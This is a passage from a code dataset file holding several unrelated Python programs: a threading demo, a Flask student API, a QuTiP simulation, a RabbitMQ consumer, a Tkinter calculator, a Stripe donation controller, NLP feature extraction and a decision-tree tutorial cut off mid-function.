+{"seq_id":"36096024","text":"\"\"\"\n\nhttps://www.youtube.com/watch?v=6eqC1WTlIqc&list=PL1A2CSdiySGIPxpSlgzsZiWDavYTAx61d&index=5\n\na basic timer program\neach timer thread will output the current time\nname - a name of a thread\n\n\"\"\"\n\nfrom threading import Thread\nimport time\n\ndef timer(name, delay, repeat):\n print(name, \" Started\")\n while repeat > 0:\n time.sleep(delay) # wait for certain amount of time\n print(name, \": \", str(time.ctime(time.time())), \"\\n\")\n repeat -= 1\n print(\"Timer: \" + name + \" Completed\")\n\ndef Main():\n # 1 is a delay, 5 times repeat\n t1 = Thread(target=timer, args=(\"Timer1\", 1, 5))\n t2 = Thread(target=timer, args=(\"Timer2\", 2, 5))\n t1.start()\n t2.start()\n\n print(\"Main completed\")\n\nif __name__ == \"__main__\":\n Main()\n","sub_path":"03_Adv_05_Multi_Threading_01.py","file_name":"03_Adv_05_Multi_Threading_01.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"5237042","text":"from flask import Flask, request, Response\nimport json \n\nfrom db_connection import get_students, add_student, delete_student, update_student\nfrom validation import validate\n\n\napp = Flask(__name__)\n\n@app.route('/students', methods = ['GET'])\ndef students():\n data = get_students()\n response = app.response_class(\n response=json.dumps(data),\n status=200,\n mimetype='application/json'\n )\n return response\n\n@app.route('/students/add', methods = ['POST'])\ndef add():\n args = request.get_json()\n\n check = validate(args['name'],args['mark'])\n if check['isValid']:\n result = add_student(args['name'],args['mark'])\n else:\n result = check\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n \n return response\n\n@app.route('/students/delete', methods = ['POST'])\ndef delete():\n args = request.get_json()\n result = delete_student(args['id'])\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n \n return response\n\t\n@app.route('/students/update', methods = ['POST'])\ndef update():\n\n args = request.get_json()\n\n check = validate(args['name'],args['mark'])\n if check['isValid']:\n result = update_student(args['id'],args['name'],args['mark'])\n else:\n result = check\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n \n return response\n\t\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27583160","text":"\r\nfrom qutip import *\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef Evolution(run_again = False):\r\n qubit_level = 3\r\n i=qeye(qubit_level)\r\n g,e = basis(qubit_level,0),basis(qubit_level,1)\r\n gd,ed = g.dag(),e.dag()\r\n\r\n if qubit_level >= 3:\r\n f = basis(qubit_level,2)\r\n\r\n a,ad = destroy(qubit_level) ,create(qubit_level)\r\n # Sx = a+ad\r\n # Sy = (ad - a)*1j\r\n # Sz = i - 2 * ad*a\r\n\r\n Sx = g*ed + e*gd\r\n Sy = 1j * (e*gd - g*ed)\r\n Sz = g*gd - e*ed\r\n\r\n omega0 = 2 * np.pi * 20\r\n Delta0=omega0\r\n T0= 0.04\r\n T= 4*T0\r\n N = 1* np.pi / 2\r\n\r\n gamma = np.pi-N\r\n k=1\r\n phase=0\r\n\r\n\r\n def Sign(t):\r\n res = 1.0 * (0 * T0 <= t <= T0) - 1.0 * (T0 < t <= 2 * T0) + \\\r\n 1.0 * (2 * T0 < t <= 3 * T0) - 1.0 * (3 * T0 < t <= 4 * T0)\r\n return res\r\n\r\n def Omega_rabi(t):\r\n tt = np.pi * t / (2 * T0)\r\n a0 = 4 * omega0 ** 2 * np.sin(tt)** 4\r\n a1 = Delta0**2 * np.pi**2 * omega0**2 * np.cos(tt)**2 * np.sin(tt)**2\r\n a2 = T0**2 * (Delta0 ** 2 * np.cos(tt) ** 4 + omega0 ** 2 * np.sin(tt) ** 4)**2\r\n #print(a0,a1,a2)\r\n res = np.abs(a0 + a1 / a2)\r\n #print(res)\r\n return np.sqrt(res)\r\n\r\n def Phase(t):\r\n tt = np.pi * t / (2 * T0)\r\n b0 = Delta0 * np.pi * np.cos(tt)\r\n b1 = 2 * T0 * omega0 ** 2 * np.sin(tt) ** 5\r\n b2 = 2 * Delta0 ** 2 * T0 * np.cos(tt)**4 * np.sin(tt)\r\n Phi0 = np.arctan(b0 / (b1 + b2))\r\n Phi = Phi0 * (0 <= t <= T0) - Phi0 * (T0 < t <= 2 * T0) + (Phi0 + N) * (2 * T0 < t <= 3 * T0) + (N - Phi0) * (\r\n 3 * T0 < t <= 4 * T0)\r\n return Phi\r\n\r\n def Omega_p(t):\r\n return Omega_rabi(t) * np.exp(-1j * Phase(t))\r\n\r\n def pulse_sx(t,args=None):\r\n return Omega_rabi(t) * np.cos(Phase(t))\r\n\r\n def pulse_sy(t,args=None):\r\n return Omega_rabi(t) * np.sin(Phase(t))\r\n\r\n def Delta(t,args=None):\r\n return Delta0 * (1 + np.cos(np.pi * t / T0)) * Sign(t)\r\n\r\n\r\n\r\n def Hami():\r\n return [[0.5*Sz,Delta],[0.5*Sx, pulse_sx],[0.5*Sy, pulse_sy]]\r\n\r\n def Hami_time(t):\r\n return 0.5*(Sz * Delta(t) + Sx * pulse_sx(t) * Sy * pulse_sy(t))\r\n\r\n Psi = (e).unit()\r\n time_interval = T / 1000\r\n tlist = np.arange(time_interval,T,time_interval)\r\n\r\n if run_again:\r\n res= mesolve(Hami(),Psi,tlist)\r\n qsave(res, 'res')\r\n else:\r\n res = qload('res')\r\n\r\n states = res.states\r\n\r\n # dynamical phases\r\n phaselist = np.zeros((len(tlist)), dtype=complex)\r\n phase_d = 0\r\n for idx,t in enumerate(tlist):\r\n phase_d=phase_d + (states[idx].dag()*Hami_time(t)*states[idx]).tr() * time_interval\r\n phaselist[idx] = phase_d\r\n\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1,2,1)\r\n\r\n color = ['b','r','g']\r\n for i in range(qubit_level):\r\n if i < len(color):\r\n color_this = color[i]\r\n else:\r\n color_this = None\r\n ax.plot(tlist/T,expect(basis(qubit_level,i)*basis(qubit_level,i).dag(),states),color = color_this,\r\n label = str(i) )\r\n ax.set_xlabel(r'$t/T$')\r\n\r\n ax.legend()\r\n\r\n ax = fig.add_subplot(1, 2, 2)\r\n ax.plot(tlist/T,np.real(phaselist)/np.pi,label = 'real')\r\n # ax.plot(tlist/T, np.imag(phaselist)/np.pi,label = 'imag')\r\n ax.set_xlabel(r'$t/T$')\r\n ax.set_ylabel(r'$rad/\\pi$')\r\n\r\n ax.legend()\r\n fig.tight_layout()\r\n\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n Evolution(run_again=True)\r\n plt.show()","sub_path":"twoQgate/LBJ_PhaseGate.py","file_name":"LBJ_PhaseGate.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"134625746","text":"def selectionSort(arr, cnt):\n for i in range(cnt - 1):\n min = i\n for j in range(i+1, cnt):\n x = arr[min][0] * arr[min][1]\n y = arr[j][0] * arr[j][1]\n if x > y:\n min = j\n elif x == y and arr[min][0] > arr[j][0]:\n min = j\n arr[i], arr[min] = arr[min], arr[i]\n\n\ndef get_submatrix(x, y):\n global submatrix, subcnt\n i = 0\n while data[x+i][y]:\n j = 0\n while data[x+i][y+j]:\n data[x+i][y+j] = 0\n j += 1\n i += 1\n submatrix.append((i, j)) #튜플저장\n\n\nimport sys\nsys.stdin = open(\"(1258)행렬찾기_input.txt\",\"r\")\nT = int(input())\nfor tc in range(T):\n N = int(input())\n data = [list(map(int, input().split())) for _ in range(N)]\n submatrix = []\n\n # subcnt = 0\n for i in range(N):\n for j in range(N):\n if data[i][j]:\n get_submatrix(i, j)\n\n submatrix.sort(key=lambda a:(a[0]*a[1], a[0]))\n\n print(f\"#{tc+1} {len(submatrix)}\", end=\" \")\n for x, y in submatrix:\n print(f\"{x} {y}\", end=\" \")\n print()\n","sub_path":"algorithm/day11/day11-A/(1258)행렬찾기2.py","file_name":"(1258)행렬찾기2.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"434401174","text":"'''消费者'''\nimport pika\n### 设置connection, channel, queue ###\n# 连接rabbitmq服务器\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n# 创建一个channel\nchannel = connection.channel()\nchannel.queue_declare(queue='hello') # 再次声明queue,如果队列存在则选择hello队列;否则,创建新队列\n\n### 设置回调函数,也就是收到消息以后做什么 ###\ndef callback(ch, method, properties, body):\n '''\n\n :param ch: send端channel的内存对象的地址\n :param method: 指的send端发给谁,发给哪个Q的一些信息,一般不怎么用\n :param properites: send端的属性,这里指的send端发过来给receive端的属性\n :param body: send端发过来的消息\n :return: None\n '''\n print(\"--> ch\",ch, \"method:\",method, \"properties\",properties)\n print('[x] Received %r' %body)\n\n### 设置消费者 ###\nchannel.basic_consume(# 消费的信息\n on_message_callback=callback, # 如果收到消息,就调用callback函数来处理消息\n queue='hello', # queue的名字\n auto_ack=True) # 消费者收到消息后,给RabbitMQ一个“已收到”的反馈\nprint(\"[*] Waiting for messages. To exit press CTRL+C\")\n# 这个start只要一启动就一直运行,它不止收一条,而是永远收下去,没有消息就在这边卡住\nchannel.start_consuming()\n","sub_path":"rabbitmq/MQ_Consumer.py","file_name":"MQ_Consumer.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"625640907","text":"'''\nAutor: Marcos Felipe da Silva\nversão: 1.0\n\nDescrição: Faz testes para troca do avatar de um usuário\n\n'''\n\nimport unittest, json\nfrom requests import Session\n\nclass TestAlterarAvatar(unittest.TestCase):\n\n def __init__(self, *args, **kargs):\n super(TestAlterarAvatar, self).__init__(*args, **kargs)\n self._host = 'http://localhost:8585'\n self._c = Session()\n self._uid = '4XhUhmpdVOb1N4OH9i4ZC5kfZVP2'\n self._url = '/alterar_avatar'\n \n def setUp(self):\n self._c.get(self._host+'/validar_autenticacao/'+self._uid)\n \n def tearDown(self):\n self._c.get(self._host+'/logout')\n \n def test_a_usuario_nao_autenticado(self):\n self._c.get(self._host+'/logout')\n files = {'arquivo': open('sem_foto.png', 'rb')}\n dados = {'dimensoes': [ [64,64], [480,640] ]}\n resp = self._c.post(self._host+self._url, files = files, data = dados).json()\n print(resp)\n self.assertIn('erro', resp.keys())\n \n def test_b_arquivo_vazio(self):\n files = {}\n dados = {'dimensoes': [ [64,64], [480,640] ]}\n resp = self._c.post(self._host+self._url, files = files, data = dados).json()\n print(resp)\n self.assertIn('erro', resp.keys())\n \n def test_c_arquivo_enviado(self):\n files = {'arquivo': open('sem_foto.png', 'rb')}\n dados = {'dimensoes':json.dumps([ [64,64], [480,640] ])}\n resp = self._c.post(self._host+self._url, files = files, data = dados).json()\n print(resp)\n self.assertIn('original', resp.keys())\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"__testes__/index/test_alterar_avatar.py","file_name":"test_alterar_avatar.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"375956876","text":"import pandas as pd\nfrom Tkinter import *\nfrom tkMessageBox import showinfo\n\n\ndef valor_alvo(val_ini,qt,tx,ct=12.0):\n val_ini = qt * val_ini\n val_exp = val_ini*(1+tx)\n val_exp = val_exp+(ct*2)\n val_exp = val_exp/qt\n return val_exp\n \n\nclass GuiApp(object):\n def __init__(self, master):\n self.master = master\n self.master.title(\"Get Valor Futuro\")\n self.master.focus_force()\n \n # labels\n \n Label(master, text=\"Valor\").grid(row=0,column=0,sticky=W,padx=10)\n Label(master, text=\"Qtde\").grid(row=1,column=0,sticky=W,padx=10)\n Label(master, text=\"TIR (%)\").grid(row=2,column=0,sticky=W,padx=10)\n \n # entrys\n \n self.entry_valor_ini = Entry(master,width=10)\n self.entry_valor_ini.grid(column=1,row=0,sticky=W,padx=10)\n \n self.entry_qtde = Entry(master,width=10)\n self.entry_qtde.grid(column=1,row=1,sticky=W,padx=10)\n \n self.entry_tir = Entry(master,width=10)\n self.entry_tir.grid(column=1,row=2,sticky=W,padx=10)\n \n # buttons\n\n self.cancel_button = Button(master, text=\"Cancel\", command=self.cancel,width=10)\n self.cancel_button.grid(column=0,row=3)\n \n self.run_button = Button(master, text=\"Run\", command=self.run,width=10)\n self.run_button.grid(column=1,row=3)\n \n def cancel(self):\n self.master.destroy()\n \n def run(self):\n \n # capture entrys values\n \n valor_inicial = float(self.entry_valor_ini.get().replace(',','.'))\n quantidade = float(self.entry_qtde.get().replace(',','.'))\n tir = float(self.entry_tir.get().replace(',','.'))/100\n \n result = valor_alvo(valor_inicial,quantidade,tir)\n result_str = 'Venda sugerida no valor:\\n{:.2f}'.format(result).replace(\".\",',')\n \n showinfo('SUCESS',result_str)\n \n def start(self):\n self.master.mainloop()\n \n# parte de inicializacao do programa (nao mexer)\n\ndef main():\n\n\tmaster = Tk()\n\tapp = GuiApp(master)\n\tapp.start()\n\n\texit()\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"App_v.01.py","file_name":"App_v.01.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"459676370","text":"# donate/controllers.py\n# Brought to you by We Vote. Be good.\n\n# -*- coding: UTF-8 -*-\n\nfrom config.base import get_environment_variable\nfrom datetime import datetime\nfrom donate.models import DonationManager\nimport stripe\nfrom wevote_functions.functions import get_ip_from_headers, positive_value_exists\n\nstripe.api_key = get_environment_variable(\"STRIPE_SECRET_KEY\")\n\n\n# TODO set up currency option in webapp\ndef donation_with_stripe_for_api(request, token, email, donation_amount, monthly_donation, voter_we_vote_id):\n\n donation_manager = DonationManager()\n success = False\n saved_stripe_donation = False\n donation_entry_saved = False\n donation_date_time = datetime.today()\n donation_status = 'STRIPE_DONATION_NOT_COMPLETED'\n action_taken = 'VOTER_SUBMITTED_DONATION'\n action_taken_date_time = donation_date_time\n charge_id = ''\n amount = 0\n currency = ''\n stripe_customer_id = ''\n subscription_saved = 'NOT_APPLICABLE'\n status = ''\n charge_processed_successfully = bool\n error_text_description = ''\n error_message = ''\n one_time_donation = True\n subscription_id = ''\n funding = ''\n livemode = False\n created = 0\n failure_code = ''\n failure_message = ''\n network_status = ''\n reason = ''\n seller_message = ''\n stripe_type = ''\n paid = ''\n amount_refunded = 0\n refund_count = 0\n name = ''\n address_zip = ''\n brand = ''\n country = ''\n exp_month = ''\n exp_year = ''\n last4 = ''\n id_card = ''\n stripe_object = ''\n stripe_status = ''\n\n ip_address = get_ip_from_headers(request)\n\n if not positive_value_exists(ip_address):\n ip_address = ''\n\n if not positive_value_exists(voter_we_vote_id):\n status += \"DONATION_WITH_STRIPE_VOTER_WE_VOTE_ID_MISSING \"\n error_results = {\n 'status': status,\n 'success': success,\n 'charge_id': charge_id,\n 'customer_id': stripe_customer_id,\n 'donation_entry_saved': donation_entry_saved,\n 'saved_stripe_donation': saved_stripe_donation,\n 'monthly_donation': monthly_donation,\n 'subscription': subscription_saved\n\n }\n\n return error_results\n\n if not positive_value_exists(email):\n status += \"DONATION_WITH_STRIPE_EMAIL_MISSING \"\n error_results = {\n 'status': status,\n 'success': success,\n 'charge_id': charge_id,\n 'customer_id': stripe_customer_id,\n 'donation_entry_saved': donation_entry_saved,\n 'saved_stripe_donation': saved_stripe_donation,\n 'monthly_donation': monthly_donation,\n 'subscription': subscription_saved\n\n }\n\n return error_results\n\n try:\n results = donation_manager.retrieve_stripe_customer_id(voter_we_vote_id)\n if results['success']:\n stripe_customer_id = results['stripe_customer_id']\n status += \"STRIPE_CUSTOMER_ID_ALREADY_EXISTS \"\n else:\n customer = stripe.Customer.create(\n source=token,\n email=email\n )\n stripe_customer_id = customer.id\n saved_results = donation_manager.create_donate_link_to_voter(stripe_customer_id, voter_we_vote_id)\n status += saved_results['status']\n\n if positive_value_exists(stripe_customer_id):\n if positive_value_exists(monthly_donation):\n recurring_donation = donation_manager.create_recurring_donation(stripe_customer_id, voter_we_vote_id,\n donation_amount, donation_date_time)\n # recurring_donation_saved = recurring_donation['recurring_donation_plan_id']\n # recurring_donation_saved = recurring_donation['status']\n subscription_saved = recurring_donation['voter_subscription_saved']\n status += recurring_donation['status']\n success = recurring_donation['success']\n one_time_donation = False\n subscription_id = recurring_donation['subscription_id']\n charge_processed_successfully = recurring_donation['success']\n # TODO April 2017: Following lines were not being executed if recurring, but what we want to do is make\n # record, and make a charge record for the first payment.\n # Previous 3 code lines will do nothing, need to rethink\n\n charge = stripe.Charge.create(\n amount=donation_amount,\n currency=\"usd\",\n customer=stripe_customer_id\n )\n status = 'STRIPE_CHARGE_SUCCESSFUL'\n charge_id = charge.id\n success = positive_value_exists(charge_id)\n\n if positive_value_exists(charge_id):\n saved_donation = donation_manager.create_donation_from_voter(stripe_customer_id, voter_we_vote_id,\n donation_amount, email,\n donation_date_time, charge_id,\n charge_processed_successfully)\n saved_stripe_donation = saved_donation['success']\n donation_status = saved_donation['status'] + ' DONATION_PROCESSED_SUCCESSFULLY '\n stripe_detail = stripe.Charge.retrieve(charge_id)\n amount = stripe_detail['amount']\n currency = stripe_detail['currency']\n amount_refunded = stripe_detail['amount_refunded']\n funding = stripe_detail['source']['funding']\n livemode = stripe_detail['livemode']\n utc_dt = datetime.utcfromtimestamp(stripe_detail['created'])\n created = utc_dt.isoformat()\n failure_code = str(stripe_detail['failure_code'])\n failure_message = str(stripe_detail['failure_message'])\n network_status = stripe_detail['outcome']['network_status']\n reason = str(stripe_detail['outcome']['reason'])\n seller_message = stripe_detail['outcome']['seller_message']\n stripe_type = stripe_detail['outcome']['type']\n paid = str(stripe_detail['paid'])\n amount_refunded = stripe_detail['amount_refunded']\n refund_count = stripe_detail['refunds']['total_count']\n name = stripe_detail['source']['name']\n address_zip = stripe_detail['source']['address_zip']\n brand = stripe_detail['source']['brand']\n country = stripe_detail['source']['country']\n exp_month = stripe_detail['source']['exp_month']\n exp_year = stripe_detail['source']['exp_year']\n last4 = int(stripe_detail['source']['last4'])\n id_card = stripe_detail['source']['id']\n stripe_object = stripe_detail['source']['object']\n stripe_status = stripe_detail['status']\n\n except stripe.error.CardError as e:\n body = e.json_body\n error_from_json = body['error']\n donation_status = \" STRIPE_STATUS_IS: {http_status} STRIPE_CARD_ERROR_IS: {error_type} \" \\\n \"STRIPE_MESSAGE_IS: {error_message} \" \\\n \"\".format(http_status=e.http_status, error_type=error_from_json['type'],\n error_message=error_from_json['message'])\n status += donation_status\n error_message = translate_stripe_error_to_voter_explanation_text(e.http_status, error_from_json['type'])\n error_text_description = donation_status\n except stripe.error.StripeError as e:\n body = e.json_body\n error_from_json = body['error']\n donation_status = \" STRIPE_STATUS_IS: {http_status} STRIPE_ERROR_IS: {error_type} \" \\\n \"STRIPE_MESSAGE_IS: {error_message} \" \\\n \"\".format(http_status=e.http_status, error_type=error_from_json['type'],\n error_message=error_from_json['message'])\n status += donation_status\n error_message = translate_stripe_error_to_voter_explanation_text(e.http_status, error_from_json['type'])\n error_text_description = donation_status\n print(donation_status)\n except Exception:\n # Something else happened, completely unrelated to Stripe\n donation_status = \"A_NON_STRIPE_ERROR_OCCURRED \"\n status += donation_status\n error_message = 'Your payment was unsuccessful. Please try again later.'\n\n result_taken = donation_status # TODO: Update this to match \"action_result\" below\n action_result = donation_status # TODO: Update this to match \"action_result\" below\n result_taken_date_time = donation_date_time\n\n # steve: These are good, will need to be expanded when webhooks are setup, to indicate recurring payments etc\n # action_taken should be VOTER_SUBMITTED_DONATION, VOTER_CANCELED_DONATION or CANCEL_REQUEST_SUBMITTED\n # action_result should be CANCEL_REQUEST_FAILED, CANCEL_REQUEST_SUCCEEDED or DONATION_PROCESSED_SUCCESSFULLY\n donation_log_results = donation_manager.create_donation_log_entry(\n ip_address, stripe_customer_id, voter_we_vote_id, charge_id, action_taken, action_taken_date_time,\n result_taken, result_taken_date_time, error_text_description, error_message)\n\n donation_history_results = donation_manager.create_donation_history_entry(\n ip_address, stripe_customer_id, voter_we_vote_id, charge_id, amount, currency, one_time_donation,\n subscription_id, funding, livemode, action_taken, action_result, created, failure_code, failure_message,\n network_status, reason, seller_message, stripe_type, paid, amount_refunded, refund_count, name, address_zip,\n brand, country, exp_month, exp_year, last4, id_card, stripe_object, stripe_status, status)\n\n donation_entry_saved = donation_log_results['success']\n\n results = {\n 'status': status,\n 'success': success,\n 'charge_id': charge_id,\n 'customer_id': stripe_customer_id,\n 'donation_entry_saved': donation_entry_saved,\n 'saved_stripe_donation': saved_stripe_donation,\n 'monthly_donation': monthly_donation,\n 'subscription': subscription_saved,\n 'error_message_for_voter': error_message\n }\n\n return results\n\n\ndef translate_stripe_error_to_voter_explanation_text(donation_http_status, error_type):\n donation_manager = DonationManager()\n generic_voter_error_message = 'Your payment was unsuccessful. Please try again later.'\n\n if donation_http_status == 402:\n error_message_for_voter = donation_manager.retrieve_stripe_card_error_message(error_type)\n else:\n error_message_for_voter = generic_voter_error_message\n\n return error_message_for_voter\n\n\n# Get a list of all prior donations by the voter that is associated with this voter_we_vote_id\n# If they donated without logging in they are out of luck for tracking past donations\ndef donation_history_for_a_voter(voter_we_vote_id):\n donation_manager = DonationManager()\n donation_list = donation_manager.retrieve_donation_history_list(voter_we_vote_id)\n\n simple_donation_list = []\n for donation_row in donation_list['voters_donation_list']:\n row = donation_row\n json_data = {\n 'created': str(row[0].isoformat()),\n 'amount': row[1],\n 'currency': row[2],\n 'one_time_donation': row[3],\n 'brand': row[4],\n 'exp_month': row[5],\n 'exp_year': row[6],\n 'last4': row[7],\n 'stripe_status': row[8],\n 'charge_id': row[9]\n }\n\n simple_donation_list.append(json_data)\n\n return simple_donation_list\n","sub_path":"donate/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"483777041","text":"import os\nimport numpy as np\nimport csv\nimport nltk\nimport re\n\n\n# Tokenizers\n\nfrom nltk.tokenize import word_tokenize, sent_tokenize\n\ndef get_words(data):\n\treturn word_tokenize(data)\n\ndef get_sentences(data):\n\treturn sent_tokenize(data)\n\n# Direct data based features\n\ndef title_length(data):\n\tchars = len(data.split())\n\treturn chars, len(data)\n\ndef article_length(data):\n\treturn len(data)\n\n# Word token based features\n\ndef get_tags(tokens):\n\treturn nltk.pos_tag(tokens)\n\ndef ttr(tokens):\n\ttypes = sorted(set(tokens))\n\tif len(tokens) != 0: # Sort all tokens to get number of unique words\n\t\treturn len(types)/len(tokens)\n\treturn 0\n\ndef longest_word_lengths(tokens, num=2):\n\tlengths = [len(token) for token in tokens]\n\tlengths.sort(reverse=True)\n\treturn lengths[:num]\n\ndef zipf(tokens):\n\tfrom nltk import FreqDist # For frequenct distribution\n\tp = FreqDist(tokens) # Finding frequency distribution of the tokens found above\n\tfreq = list(p.values())\n\n\tfreq.sort(reverse=True) # Sort freq reverse to get ranked values\n\n\tf = np.array(freq)\n\tr = np.arange(1, len(f)+1)\n\n\tk = np.median(f*r)\n\treturn k\n\ndef heap(tokens):\n\tunique = []\n\n\twords = []\n\tvocab = []\n\n\tcurr_word = 0\n\tcurr_uniq = 0\n\n\tfor token in tokens:\n\t\tcurr_word = curr_word + 1\n\t\tif token not in unique:\n\t\t\tunique.append(token)\n\t\t\tcurr_uniq = curr_uniq + 1\n\t\n\t\tvocab.append(curr_uniq)\n\t\twords.append(curr_word)\n\n\tV = np.array(vocab)\n\tN = np.array(words)\n\n\t# Using Least Squares Method, the above line has slope and intercept as follows\n\n\tn = np.log(N)\n\tv = np.log(V)\n\n\tk = (((np.mean(n)*np.mean(v)) - np.mean(n*v)) / ((np.mean(n)*np.mean(n)) - np.mean(n*n)))\n\t \n\tb = np.mean(v) - k*np.mean(n)\n\n\treturn k, b\n\n\n\n# Sentence token based features\n\ndef get_sent_lengths(sents):\n\tlengths = [len(sent) for sent in sents]\n\tlengths.sort(reverse=True)\n\treturn lengths\n\ndef longest_sent_lengths(sents):\n\tlengths = get_sent_lengths(sents)\n\treturn lengths[:2]\n\ndef avg_sent_length(sents):\n\tlengths = get_sent_lengths(sents)\n\tif len(lengths) == 0:\n\t\treturn 0\n\treturn sum(lengths)/len(lengths)\n\n\nfrom nltk.data import load\ntagdict = load('help/tagsets/upenn_tagset.pickle')\n\n\nTW = \"/home/manas/Semester VII/Natural Language Processing/16110031_local.csv\"\nLI = \"/home/manas/Semester VII/Natural Language Processing/Project/Data Extraction/Links/3D Printing in Medicine.csv\"\nCA = \"/home/manas/Semester VII/Natural Language Processing/Project/Cancer.csv\"\n\nwith open(LI,\"r\") as f:\n\t# for row in f:\n\t# \ts = row\n\t# \tprint(s)\n\t# \tprint(\"\\n\")\n\treader=csv.reader(f)\n\tfor idx, row in enumerate(reader):\n\t\t# print(row[1]),\n\t\t# print(nltk.pos_tag(row[1].split(\" \")))\n\t\tif idx==0:\n\t\t\tcontinue\n\n\t\tdata = re.sub(r'[^A-Za-z0-9. ]+', ' ', row[1])\n\t\tdata = \" \".join(data.split())\n\n\t\twords = get_words(data)\n\t\tsentences = get_sentences(data)\n\n\t\ttags = get_tags(words)\n\t\tprint(idx, data[:20]) \n\t\t\n\t\t# print()\n\n\t\t\n\t\t\n\t\tkeys = list(tagdict.keys())\n\t\tkeys.sort()\n\n\t\tdist = {}\n\n\t\tfor k in keys:\n\t\t\tdist[k] = 0\n\n\t\tfor tag in tags:\n\t\t\tdist[tag[1]] += 1\n\n\t\ttag_features = []\n\t\tfor k in keys:\n\t\t\ttag_features.append(dist[k])\n\n\t\tprint(tag_features)\n\t\t# possible_tags= set([tag[1] for tag in tags])\n\t\t# for tag in possible_tags:\n\t\t# \ttry:\n\t\t# \t\tdist[tag] += 1\n\t\t# \texcept:\n\t\t# \t\tdist[tag] = 1\n\n\t\t# print(dist)\n\t\thead = [\"Number of Tokens\",\"Article Length\", \"TTR\", \"longest_word_lengths\", \"Zipf\", \"heap\", \"longest_sent_lengths\", \"avg_sent_length\" ]\n\t\tvalues = [len(words), article_length(data), ttr(words), longest_word_lengths(words), zipf(words), heap(words), longest_sent_lengths(sentences), avg_sent_length(sentences)]\n\n\t\tfor i in range(len(head)):\n\t\t\tprint(head[i],\": \",values[i])\n\n\t\tprint()\n\n\t\t","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"140067190","text":"# -*- coding: UTF-8 -*-\nfrom math import log\nimport operator\n\n\"\"\"\n函数说明:计算给定数据集的经验熵(香农熵)\n\nParameters:\n\tdataSet - 数据集\nReturns:\n\tshannonEnt - 经验熵(香农熵)\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-24\n\"\"\"\ndef calcShannonEnt(dataSet):\n\tnumEntires = len(dataSet) #返回数据集的行数\n\tlabelCounts = {} #保存每个标签(Label)出现次数的字典\n\tfor featVec in dataSet: #对每组特征向量进行统计\n\t\tcurrentLabel = featVec[-1] #提取标签(Label)信息\n\t\tif currentLabel not in labelCounts.keys(): #如果标签(Label)没有放入统计次数的字典,添加进去\n\t\t\tlabelCounts[currentLabel] = 0\n\t\tlabelCounts[currentLabel] += 1 #Label计数\n\tshannonEnt = 0.0 #经验熵(香农熵)\n\tfor key in labelCounts: #计算香农熵\n\t\tprob = float(labelCounts[key]) / numEntires #选择该标签(Label)的概率\n\t\tshannonEnt -= prob * log(prob, 2) #利用公式计算\n\treturn shannonEnt #返回经验熵(香农熵)\n\n\"\"\"\n函数说明:创建测试数据集\n\nParameters:\n\t无\nReturns:\n\tdataSet - 数据集\n\tlabels - 特征标签\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-20\n\"\"\"\ndef createDataSet():\n\tdataSet = [[0, 0, 0, 0, 'no'], #数据集\n\t\t\t[0, 0, 0, 1, 'no'],\n\t\t\t[0, 1, 0, 1, 'yes'],\n\t\t\t[0, 1, 1, 0, 'yes'],\n\t\t\t[0, 0, 0, 0, 'no'],\n\t\t\t[1, 0, 0, 0, 'no'],\n\t\t\t[1, 0, 0, 1, 'no'],\n\t\t\t[1, 1, 1, 1, 'yes'],\n\t\t\t[1, 0, 1, 2, 'yes'],\n\t\t\t[1, 0, 1, 2, 'yes'],\n\t\t\t[2, 0, 1, 2, 'yes'],\n\t\t\t[2, 0, 1, 1, 'yes'],\n\t\t\t[2, 1, 0, 1, 'yes'],\n\t\t\t[2, 1, 0, 2, 'yes'],\n\t\t\t[2, 0, 0, 0, 'no']]\n\tlabels = ['年龄', '有工作', '有自己的房子', '信贷情况'] #特征标签\n\treturn dataSet, labels #返回数据集和分类属性\n\n\"\"\"\n函数说明:按照给定特征划分数据集\n\nParameters:\n\tdataSet - 待划分的数据集\n\taxis - 划分数据集的特征\n\tvalue - 需要返回的特征的值\nReturns:\n\t无\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-24\n\"\"\"\ndef splitDataSet(dataSet, axis, value): \n\tretDataSet = [] #创建返回的数据集列表\n\tfor featVec in dataSet: #遍历数据集\n\t\tif featVec[axis] == value:\n\t\t\treducedFeatVec = featVec[:axis] #去掉axis特征\n\t\t\treducedFeatVec.extend(featVec[axis+1:]) 